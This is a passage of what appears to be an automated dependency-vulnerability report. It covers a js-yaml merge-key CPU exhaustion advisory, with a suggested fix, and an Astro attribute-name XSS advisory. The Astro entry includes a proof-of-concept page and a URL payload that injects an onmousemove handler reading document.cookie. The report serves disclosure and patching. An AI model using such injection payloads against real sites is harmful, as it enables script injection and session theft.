automation services. An attacker can submit crafted YAML to significantly increase CPU time and reduce availability. Suggested fix: Dedupe the merge source list by reference before invoking mergeMappings. Any of the following are minimal and preserve YAML 1.1 merge semantics: dedupe in storeMappingPair: if (keyTag === 'tag:yaml.org,2002:merge') { if (Array.isArray(valueNode)) { var seen = new Set(); for (index = 0, quantity = valueNode.length; index < quantity; index += 1) { var src = valueNode[index]; if (seen.has(src)) continue; // idempotent; skip redundant alias seen.add(src); mergeMappings(state, _result, src, overridableKeys); } } else { mergeMappings(state, _result, valueNode, overridableKeys); } }
Publish Date: 2026-06-15
URL: CVE-2026-53550
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: Low
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-06-15
Fix Resolution: https://github.com/nodeca/js-yaml.git - 4.2.0
Vulnerable Library - astro-6.3.7.tgz
Astro is a modern site builder with web best practices, performance, and DX front-of-mind.
Library home page: https://registry.npmjs.org/astro/-/astro-6.3.7.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json,/docs/starlight-docs/package.json
Dependency Hierarchy:
Found in HEAD commit: ec994c1a9bf5ae33c1721ef3568d20d917573751
Found in base branch: main
Vulnerability Details
Summary The "spreadAttributes" function in Astro's server-side rendering pipeline iterates over object keys and passes them directly to "addAttribute", which interpolates the key into the HTML output without escaping. When a developer uses the spread syntax "{...props}" on an HTML element and the object keys come from an untrusted source (API, CMS, URL parameters), an attacker can inject arbitrary HTML attributes including event handlers like "onmousemove", "onclick", or break out of the attribute context entirely to inject new elements. Details The vulnerable function is ""addAttribute"" (https://github.com/withastro/astro/blob/main/packages/astro/src/runtime/server/render/util.ts#L81-L141) at "packages/astro/src/runtime/server/render/util.ts:81-141": export function addAttribute(value: any, key: string, shouldEscape = true, tagName = '') { if (value == null) { return ''; } return markHTMLString(" ${key}="${toAttributeString(value, shouldEscape)}""); // key interpolated not escaped } This function is called from ""spreadAttributes"" (https://github.com/withastro/astro/blob/main/packages/astro/src/runtime/server/index.ts#L91-L92) at "packages/astro/src/runtime/server/index.ts:91-92": for (const [key, value] of Object.entries(values)) { output += addAttribute(value, key, true, _name); } The "toAttributeString" function escapes the attribute value, but the attribute name "key" is never validated or escaped. An attacker can craft a JSON object with a key containing " characters to break out of the attribute context and inject event handlers. Execution flow: User controlled object keys (from API, CMS, URL params) are spread onto element via "{...props}". The compiler generates "spreadAttributes(props)" which iterates with "Object.entries()" and calls "addAttribute(value, key)". The key is interpolated as "" ${key}="${escapedValue}""". A malicious key breaks attribute context, resulting in XSS. POC Create an SSR Astro page ("src/pages/index.astro"): const props = JSON.parse(Astro.url.searchParams.get('props') || '{}');
Hello
<div {...props}>Move mouse here Enable SSR in "astro.config.mjs" (for URL based demo): export default defineConfig({ output: 'server' }); Note: SSR is not required for the vulnerability to exist. In static builds (default), the attack vector is compromised data sources at build time (API, CMS, database). SSR simply makes the PoC easier to demonstrate via URL parameters. Start the dev server and visit: http://localhost:4321/?props={"x\" onmousemove="alert(document.cookie)" y":""} URL encoded: http://localhost:4321/?props=%7B%22x%5C%22%20onmousemove%3D%5C%22alert(document.cookie)%5C%22%20y%22%3A%22%22%7D View the HTML source. The output contains: <div x" onmousemove="alert(document.cookie)" y="">Move mouse here The key "x" onmousemove="alert(document.cookie)" y" breaks out of the attribute context. Moving the mouse over the div executes the JavaScript.Publish Date: 2026-06-16
URL: CVE-2026-54298
CVSS 3 Score Details (4.2)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-jrpj-wcv7-9fh9
Release Date: 2026-06-16
Fix Resolution: astro - 6.4.6